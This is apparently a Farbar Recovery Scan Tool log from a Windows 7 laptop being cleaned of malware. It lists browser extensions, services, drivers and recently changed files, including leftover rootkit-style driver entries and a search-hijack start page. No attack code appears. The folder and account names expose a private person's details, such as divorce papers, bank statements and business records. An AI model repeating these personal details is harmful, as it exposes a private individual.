FF Plugin ProgramFiles/Appdata: C:\Users\Ric\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ric\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\aolsearch.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\McSiteAdvisor.xml
FF HKLM-x32\...\Firefox\Extensions: [{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}] - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}
FF Extension: Adobe Contribute Toolbar - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9} [2011-02-26]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR HomePage: hxxp://www.msn.com/?pc=BDT3&ocid=BDT3DHP&dt=101013
CHR StartupUrls: "hxxp://www.msn.com/?pc=BDT3&ocid=BDT3DHP&dt=101013", "hxxp://search.startnow.com/?src=startpage&provider=&provider_name=startnow&provider_code=&partner_id=999&product_id=10&affiliate_id=&channel=&toolbar_id=&toolbar_version=&install_country=&install_date=20140228&user_guid=F7245D26E1254072935314207A495284&machine_id=3b988bf6eb0c494be4e168f8f978bb6b&browser=cr&os=win&os_version=6.1-x64-SP1", "hxxp://blank/"
CHR Extension: (Plug-in Terminal Class) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajpgkpeckebdhofmmjfgcjjiiejpodla [2014-06-05]
CHR Extension: (Google Docs) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-10-06]
CHR Extension: (Google Drive) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-10-06]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-27]
CHR Extension: (YouTube) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-21]
CHR Extension: (Google Search) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-21]
CHR Extension: (Google Wallet) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-04]
CHR Extension: (Gmail) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-21]

==================== Services (Whitelisted) =================

R2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269; C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [457200 2009-06-02] ()
S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2011-03-02] (Adobe Systems) [File not signed]
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2255064 2013-10-28] (Broadcom Corporation.)
R2 BOT4Service; C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe [32240 2010-07-14] ()
R2 CLCapSvc; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe [262239 2007-08-02] () [File not signed]
R2 CLSched; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe [110685 2007-08-02] () [File not signed]
R2 CyberLink Media Library Service; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe [1073152 2007-08-02] (Cyberlink) [File not signed]
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [1436192 2014-05-19] (Fitbit, Inc.)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2011-09-06] ()
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 PCPitstop Scheduling; C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe [86016 2010-09-13] (PC Pitstop LLC) [File not signed]
R2 QDLService2kDell; C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [330488 2010-01-14] (QUALCOMM, Inc.)
S3 RoxMediaDB13; C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [1099248 2010-07-16] (Sonic Solutions)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\STacSV64.exe [244736 2010-01-21] (IDT, Inc.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 WMCoreService; C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe [447488 2009-11-26] () [File not signed]
S4 x10nets; C:\Program Files (x86)\Trivia Board Pro 4\X10nets.exe [20480 2001-11-12] (X10) [File not signed]

==================== Drivers (Whitelisted) ====================

S3 61883; C:\Windows\System32\DRIVERS\61883.sys [60288 2009-07-13] (Microsoft Corporation)
S3 ATIAVPCI; C:\Windows\System32\DRIVERS\atinavrr.sys [1200512 2007-07-05] (ATI Technologies Inc.)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [170712 2013-10-28] (Broadcom Corporation.)
R3 ITECIRfilter; C:\Windows\System32\DRIVERS\ITECIRfilter.sys [28264 2011-03-22] (ITE Tech. Inc. )
S3 Netaapl; C:\Windows\System32\DRIVERS\netaapl64.sys [22528 2011-05-10] (Apple Inc.) [File not signed]
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [74752 2011-07-25] (Research In Motion Limited)
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-11-02] ()
U5 VWiFiFlt; C:\Windows\System32\Drivers\VWiFiFlt.sys [59904 2009-07-13] (Microsoft Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S1 qnmokglx; \??\C:\Windows\system32\drivers\qnmokglx.sys [X]
S1 smvowoli; \??\C:\Windows\system32\drivers\smvowoli.sys [X]
S3 wanatw; system32\DRIVERS\wanatw64.sys [X]
S0 xnvdb; System32\drivers\cixf.sys [X]

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-07-17 22:20 - 2014-07-17 22:20 - 00019115 _____ () C:\Users\Ric\Desktop\FRST.txt
2014-07-17 20:35 - 2014-07-17 20:35 - 11204096 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2014-07-17 16:56 - 2014-07-17 16:56 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-07-17 16:53 - 2014-07-17 16:55 - 02347384 _____ (ESET) C:\Users\Ric\Desktop\esetsmartinstaller_enu.exe
2014-07-17 09:58 - 2014-07-17 09:58 - 00026139 _____ () C:\ComboFix.txt
2014-07-17 09:02 - 2014-07-17 09:02 - 00026171 _____ () C:\ComboFix1st.txt
2014-07-16 19:49 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-07-16 19:49 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-07-16 19:49 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-07-16 19:49 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-07-16 19:49 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-07-16 19:49 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-07-16 19:49 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-07-16 19:49 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-07-16 19:44 - 2014-07-17 09:58 - 00000000 ____D () C:\Qoobox
2014-07-16 19:43 - 2014-07-16 22:06 - 00000000 ____D () C:\Windows\erdnt
2014-07-16 19:40 - 2014-07-16 19:40 - 05221447 ____R (Swearware) C:\Users\Ric\Desktop\ComboFix.exe
2014-07-16 11:10 - 2014-07-16 11:13 - 00056906 _____ () C:\Users\Ric\Desktop\Addition.txt
2014-07-16 10:53 - 2014-07-16 11:13 - 00063179 _____ () C:\Users\Ric\Desktop\FRST1.txt
2014-07-16 10:48 - 2014-07-17 22:20 - 00000000 ____D () C:\FRST
2014-07-16 10:47 - 2014-07-16 10:47 - 02086912 _____ (Farbar) C:\Users\Ric\Desktop\FRST64.exe
2014-07-15 23:25 - 2014-07-15 23:25 - 00021104 _____ () C:\Users\Ric\Desktop\dds.txt
2014-07-15 23:25 - 2014-07-15 23:25 - 00013578 _____ () C:\Users\Ric\Desktop\attach.txt
2014-07-15 23:04 - 2014-07-15 23:04 - 00688992 ____R (Swearware) C:\Users\Ric\Desktop\dds.com
2014-07-14 11:20 - 2014-07-14 11:20 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-DELL-XPS-1645-Microsoft-Windows-7-Professional-(64-bit).dat
2014-07-14 11:20 - 2014-07-14 11:20 - 00000000 ____D () C:\RegBackup
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-07-12 13:01 - 2014-03-06 23:53 - 02925760 _____ (Sysinternals - www.sysinternals.com) C:\Users\Ric\Desktop\procexp.exe
2014-07-12 12:44 - 2014-07-12 22:45 - 00000004 _____ () C:\Windows\msoffice.ini
2014-07-12 12:44 - 2014-07-12 22:45 - 00000000 ____D () C:\Users\Ric\Desktop\AOL Saved PFC
2014-07-11 15:26 - 2014-07-11 15:26 - 00002358 _____ () C:\Users\Ric\Desktop\JRT.txt
2014-07-11 15:19 - 2014-07-11 15:19 - 00000000 ____D () C:\Windows\ERUNT
2014-07-11 14:58 - 2014-07-12 13:01 - 00000000 ____D () C:\Kits
2014-07-11 14:26 - 2014-07-11 14:26 - 01166640 _____ () C:\Windows\Minidump\071114-42635-01.dmp
2014-07-09 15:33 - 2014-07-09 15:34 - 00000000 ____D () C:\Users\roy\1
2014-07-06 14:20 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-07-06 14:17 - 2014-07-13 14:11 - 00000000 ____D () C:\AdwCleaner
2014-07-06 14:15 - 2014-07-06 14:15 - 00000000 ____D () C:\Users\Ric\AppData\Local\GHISLER
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieUserList
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieSiteList
2014-07-06 11:47 - 2014-07-14 11:00 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-07-06 11:46 - 2014-07-06 11:46 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-07-06 11:46 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-07-06 11:46 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-07-05 22:06 - 2014-07-05 22:06 - 00000000 ____D () C:\Users\roy\AppData\Local\GHISLER
2014-07-05 22:04 - 2014-07-05 22:04 - 00000736 _____ () C:\Users\Public\Desktop\Total Commander 64 bit.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000722 _____ () C:\Users\Public\Desktop\Total Commander.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total Commander
2014-07-05 14:46 - 2014-07-05 14:46 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Notepad++
2014-07-05 14:25 - 2014-07-05 14:25 - 00453480 _____ () C:\Users\roy\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-05 14:23 - 2014-07-05 14:23 - 00001417 _____ () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Apple Computer
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Adobe
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Local\Google
2014-07-05 14:22 - 2014-07-09 15:33 - 00000000 ____D () C:\Users\roy
2014-07-05 14:22 - 2014-07-05 14:22 - 00000020 ___SH () C:\Users\roy\ntuser.ini
2014-07-05 14:22 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy\AppData\Local\VirtualStore
2014-07-05 14:22 - 2011-08-08 15:10 - 00000000 ____D () C:\Users\roy\AppData\Local\Microsoft Help
2014-07-05 14:22 - 2011-03-06 17:02 - 00000000 ____D () C:\Users\roy\AppData\Local\SoftThinks
2014-07-05 14:22 - 2011-02-26 00:54 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Macromedia
2014-07-05 14:22 - 2009-07-14 00:54 - 00000000 ___RD () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-07-05 14:22 - 2009-07-14 00:49 - 00000000 ___RD () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-07-05 13:53 - 2014-07-05 13:53 - 00139544 ____H () C:\Users\Ric\Downloads\Donna Summer - Last Dance.mp3.z1a
2014-07-05 12:52 - 2014-07-13 13:30 - 00000000 ____D () C:\Roy
2014-07-04 13:27 - 2014-07-04 13:32 - 20787200 _____ () C:\Users\Ric\qdata2010.QDF
2014-07-04 04:24 - 2014-07-04 13:24 - 00001120 _____ () C:\Users\Ric\Downloads\qdata2010 (1)OFXLOG.DAT
2014-07-04 04:19 - 2014-07-04 13:28 - 20787200 _____ () C:\Users\Ric\Downloads\qdata2010 (1).qdf
2014-07-04 04:19 - 2014-07-04 04:19 - 20780389 _____ () C:\Users\Ric\Downloads\qdata2010 (2).qdf
2014-07-02 07:15 - 2014-07-02 07:15 - 00003288 _____ () C:\bootsqm.dat
2014-07-01 21:05 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\Cohey photos
2014-06-25 20:48 - 2014-07-07 23:57 - 00003194 _____ () C:\Windows\System32\Tasks\{72E0739B-EEC6-4FAB-AD23-1B069503C4B5}
2014-06-25 20:26 - 2014-06-25 20:50 - 00000961 ____H () C:\IPH.PH
2014-06-25 20:20 - 2014-06-25 20:20 - 00208400 _____ (AOL LLC.) C:\Users\Ric\Downloads\AOLDNLD.exe
2014-06-25 19:29 - 2014-06-25 19:30 - 00369792 _____ () C:\Windows\Minidump\062514-34335-01.dmp
2014-06-25 19:23 - 2014-07-01 15:28 - 20742144 _____ () C:\Users\Ric\Downloads\qdata2010.qdf
2014-06-25 19:23 - 2014-07-01 15:27 - 00000896 _____ () C:\Users\Ric\Downloads\qdata2010OFXLOG.DAT
2014-06-23 19:36 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\EB PICS
2014-06-23 19:04 - 2014-06-23 19:05 - 00370536 _____ () C:\Windows\Minidump\062314-33337-01.dmp
2014-06-20 21:32 - 2014-06-20 21:32 - 00000000 ____D () C:\Users\Ric\Documents\Roxio Projects
2014-06-20 21:25 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\Mary picture folder
2014-06-18 16:45 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Documents\Divorce Civi lCover Sheet
2014-06-18 16:44 - 2014-06-18 16:45 - 01051112 _____ () C:\Users\Ric\Documents\Divorce Civi lCover Sheet.zip
2014-06-18 16:31 - 2014-06-18 16:32 - 00378088 _____ () C:\Windows\Minidump\061814-37799-01.dmp
2014-06-18 16:20 - 2014-06-18 16:20 - 00262144 _____ () C:\Windows\Minidump\061814-48672-01.dmp
2014-06-18 09:49 - 2014-06-18 09:49 - 00000000 ____D () C:\ProgramData\Package Cache
2014-06-18 09:48 - 2014-06-18 09:48 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-06-18 09:47 - 2014-06-18 09:47 - 00000000 ____D () C:\AMD
2014-06-18 09:39 - 2014-06-18 09:40 - 00569856 _____ () C:\Windows\Minidump\061814-35069-01.dmp
2014-06-17 16:54 - 2014-06-17 16:55 - 00369840 _____ () C:\Windows\Minidump\061714-74116-01.dmp
2014-06-17 16:42 - 2014-06-17 16:43 - 00369808 _____ () C:\Windows\Minidump\061714-29546-01.dmp

==================== One Month Modified Files and Folders =======

2014-07-17 22:21 - 2014-07-17 22:20 - 00019115 _____ () C:\Users\Ric\Desktop\FRST.txt
2014-07-17 22:20 - 2014-07-16 10:48 - 00000000 ____D () C:\FRST
2014-07-17 22:20 - 2009-07-14 01:13 - 00006728 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-07-17 22:16 - 2011-08-28 11:40 - 00000900 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job
2014-07-17 22:15 - 2013-10-06 14:24 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-07-17 21:35 - 2012-03-31 11:56 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-07-17 20:35 - 2014-07-17 20:35 - 11204096 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2014-07-17 20:35 - 2012-03-31 11:56 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-07-17 20:35 - 2012-03-31 11:56 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-07-17 20:35 - 2011-05-18 15:14 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-07-17 19:37 - 2011-02-25 23:12 - 01368929 _____ () C:\Windows\WindowsUpdate.log
2014-07-17 16:56 - 2014-07-17 16:56 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-07-17 16:55 - 2014-07-17 16:53 - 02347384 _____ (ESET) C:\Users\Ric\Desktop\esetsmartinstaller_enu.exe
2014-07-17 16:54 - 2009-07-14 00:45 - 00013792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-07-17 16:54 - 2009-07-14 00:45 - 00013792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-07-17 16:46 - 2014-06-07 19:57 - 00011046 _____ () C:\Windows\setupact.log
2014-07-17 16:46 - 2013-10-06 14:24 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-07-17 16:46 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-07-17 13:22 - 2013-02-14 10:26 - 00415468 _____ () C:\Windows\PFRO.log
2014-07-17 13:16 - 2011-08-28 11:40 - 00000848 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job
2014-07-17 09:58 - 2014-07-17 09:58 - 00026139 _____ () C:\ComboFix.txt
2014-07-17 09:58 - 2014-07-16 19:44 - 00000000 ____D () C:\Qoobox
2014-07-17 09:56 - 2009-07-13 22:34 - 00000215 _____ () C:\Windows\system.ini
2014-07-17 09:02 - 2014-07-17 09:02 - 00026171 _____ () C:\ComboFix1st.txt
2014-07-17 07:44 - 2011-03-25 16:29 - 00000000 ____D () C:\ProgramData\PCPitstop
2014-07-16 22:55 - 2013-12-12 09:53 - 00000000 ____D () C:\Users\Ric\Documents\POOL
2014-07-16 22:08 - 2011-03-05 13:45 - 00000000 ____D () C:\Users\Vincent  DAmico
2014-07-16 22:08 - 2011-03-05 13:45 - 00000000 ____D () C:\Users\TEMP
2014-07-16 22:08 - 2011-03-05 13:45 - 00000000 ____D () C:\Users\Ric Mitchell
2014-07-16 22:08 - 2011-03-05 13:45 - 00000000 ____D () C:\Users\Mary Fitzgerald
2014-07-16 22:08 - 2011-03-05 13:45 - 00000000 ____D () C:\Users\Administrator
2014-07-16 22:08 - 2009-07-13 23:20 - 00000000 __RHD () C:\Users\Default
2014-07-16 22:06 - 2014-07-16 19:43 - 00000000 ____D () C:\Windows\erdnt
2014-07-16 20:04 - 2011-02-25 21:20 - 00000000 ____D () C:\Users\Ric
2014-07-16 19:40 - 2014-07-16 19:40 - 05221447 ____R (Swearware) C:\Users\Ric\Desktop\ComboFix.exe
2014-07-16 11:13 - 2014-07-16 11:10 - 00056906 _____ () C:\Users\Ric\Desktop\Addition.txt
2014-07-16 11:13 - 2014-07-16 10:53 - 00063179 _____ () C:\Users\Ric\Desktop\FRST1.txt
2014-07-16 10:47 - 2014-07-16 10:47 - 02086912 _____ (Farbar) C:\Users\Ric\Desktop\FRST64.exe
2014-07-15 23:25 - 2014-07-15 23:25 - 00021104 _____ () C:\Users\Ric\Desktop\dds.txt
2014-07-15 23:25 - 2014-07-15 23:25 - 00013578 _____ () C:\Users\Ric\Desktop\attach.txt
2014-07-15 23:04 - 2014-07-15 23:04 - 00688992 ____R (Swearware) C:\Users\Ric\Desktop\dds.com
2014-07-15 14:10 - 2011-02-25 21:53 - 00453480 _____ () C:\Users\Ric\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-14 13:32 - 2009-07-14 00:45 - 05809096 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-07-14 13:27 - 2011-02-26 12:01 - 00006728 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-07-14 11:20 - 2014-07-14 11:20 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-DELL-XPS-1645-Microsoft-Windows-7-Professional-(64-bit).dat
2014-07-14 11:20 - 2014-07-14 11:20 - 00000000 ____D () C:\RegBackup
2014-07-14 11:00 - 2014-07-06 11:47 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-07-13 14:11 - 2014-07-06 14:17 - 00000000 ____D () C:\AdwCleaner
2014-07-13 13:30 - 2014-07-05 12:52 - 00000000 ____D () C:\Roy
2014-07-12 22:46 - 2011-02-26 14:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AOL
2014-07-12 22:46 - 2011-02-26 14:13 - 00000000 ____D () C:\ProgramData\AOL
2014-07-12 22:45 - 2014-07-12 12:44 - 00000004 _____ () C:\Windows\msoffice.ini
2014-07-12 22:45 - 2014-07-12 12:44 - 00000000 ____D () C:\Users\Ric\Desktop\AOL Saved PFC
2014-07-12 22:45 - 2011-02-26 14:14 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\AOL
2014-07-12 13:01 - 2014-07-11 14:58 - 00000000 ____D () C:\Kits
2014-07-12 12:22 - 2014-01-31 12:35 - 00000367 _____ () C:\dldt.log
2014-07-12 12:22 - 2011-02-25 21:59 - 00000000 ____D () C:\Program Files (x86)\Dell
2014-07-12 11:50 - 2012-10-31 11:16 - 00000990 _____ () C:\ProgramData\dlea.log
2014-07-12 11:50 - 2011-03-03 17:30 - 00274947 _____ () C:\ProgramData\dleascan.log
2014-07-11 16:25 - 2011-02-26 12:00 - 00000000 ____D () C:\Windows\en
2014-07-11 15:26 - 2014-07-11 15:26 - 00002358 _____ () C:\Users\Ric\Desktop\JRT.txt
2014-07-11 15:19 - 2014-07-11 15:19 - 00000000 ____D () C:\Windows\ERUNT
2014-07-11 14:26 - 2014-07-11 14:26 - 01166640 _____ () C:\Windows\Minidump\071114-42635-01.dmp
2014-07-11 14:26 - 2014-06-10 08:38 - 663370964 _____ () C:\Windows\MEMORY.DMP
2014-07-11 14:26 - 2011-04-01 13:13 - 00000000 ____D () C:\Windows\Minidump
2014-07-10 12:32 - 2009-07-13 23:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-07-09 17:57 - 2013-03-21 13:42 - 00000000 ____D () C:\Windows\pss
2014-07-09 15:34 - 2014-07-09 15:33 - 00000000 ____D () C:\Users\roy\1
2014-07-09 15:33 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy
2014-07-07 23:57 - 2014-06-25 20:48 - 00003194 _____ () C:\Windows\System32\Tasks\{72E0739B-EEC6-4FAB-AD23-1B069503C4B5}
2014-07-07 23:56 - 2011-12-12 12:39 - 00003342 _____ () C:\Windows\System32\Tasks\{7677B741-0E06-4511-B4C6-F7582CC2898C}
2014-07-07 23:55 - 2014-06-16 09:13 - 00003442 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-07-07 23:55 - 2014-06-16 09:13 - 00003204 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-07-07 23:55 - 2011-02-26 00:21 - 00003940 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{05BF1867-8CD9-4C56-919F-A77D7EF5FBBD}
2014-07-07 23:54 - 2014-06-16 09:13 - 00003992 _____ () C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2014-07-07 23:45 - 2011-02-27 19:51 - 00000000 ____D () C:\ProgramData\Sonic
2014-07-07 23:44 - 2013-11-28 18:33 - 00000000 ____D () C:\Program Files\Google
2014-07-07 23:44 - 2012-01-02 14:21 - 00000000 ____D () C:\Program Files (x86)\Google
2014-07-07 23:35 - 2011-08-28 11:40 - 00000000 ____D () C:\Users\Ric\AppData\Local\Google
2014-07-07 22:27 - 2014-07-01 21:05 - 00000000 ____D () C:\Users\Ric\Desktop\Cohey photos
2014-07-07 22:27 - 2014-06-23 19:36 - 00000000 ____D () C:\Users\Ric\Desktop\EB PICS
2014-07-07 22:27 - 2014-06-20 21:25 - 00000000 ____D () C:\Users\Ric\Desktop\Mary picture folder
2014-07-07 22:27 - 2014-06-18 16:45 - 00000000 ____D () C:\Users\Ric\Documents\Divorce Civi lCover Sheet
2014-07-07 22:27 - 2014-06-16 16:04 - 00000000 ____D () C:\Users\Ric\Documents\Divorce folder
2014-07-07 22:27 - 2014-06-16 09:38 - 00000000 ____D () C:\ProgramData\QUALCOMM
2014-07-07 22:27 - 2014-06-14 15:08 - 00000000 ____D () C:\Users\Ric\Desktop\Square Pics
2014-07-07 22:27 - 2014-06-13 10:48 - 00000000 ____D () C:\Users\Ric\Desktop\Monkey Trip
2014-07-07 22:27 - 2014-06-11 07:32 - 00000000 ____D () C:\Users\Ric\Documents\Knott karaoke files
2014-07-07 22:27 - 2014-06-11 07:32 - 00000000 ____D () C:\Users\Ric\Documents\Fernandina and Friends Trivia Night 2014
2014-07-07 22:27 - 2014-06-03 11:38 - 00000000 ____D () C:\Users\Ric\AppData\Local\Intuit
2014-07-07 22:27 - 2014-06-01 16:23 - 00000000 ____D () C:\ProgramData\FitbitConnect
2014-07-07 22:27 - 2014-05-27 09:11 - 00000000 ____D () C:\Users\Ric\Documents\Mary divorce folder
2014-07-07 22:27 - 2014-05-21 07:51 - 00000000 ____D () C:\Users\Ric\Documents\Landale Hanlon Trivia Night 7-3-14
2014-07-07 22:27 - 2014-05-17 16:47 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Parrty Cards
2014-07-07 22:27 - 2014-04-23 16:21 - 00000000 ____D () C:\Users\Ric\Documents\Chase statements
2014-07-07 22:27 - 2014-04-09 07:11 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Traditional cards
2014-07-07 22:27 - 2014-04-05 18:35 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Oldies cards
2014-07-07 22:27 - 2014-04-01 08:05 - 00000000 ____D () C:\Users\Ric\Documents\Villages Entertainment Blank W-9 and Square info
2014-07-07 22:27 - 2014-03-31 08:01 - 00000000 ____D () C:\Users\Ric\Documents\Villages Entertainment
2014-07-07 22:27 - 2014-03-23 18:47 - 00000000 ___HD () C:\Users\Ric\Documents\.picasaoriginals
2014-07-07 22:27 - 2014-03-17 17:34 - 00000000 ____D () C:\Users\Ric\Documents\BINGOEVENTpayout
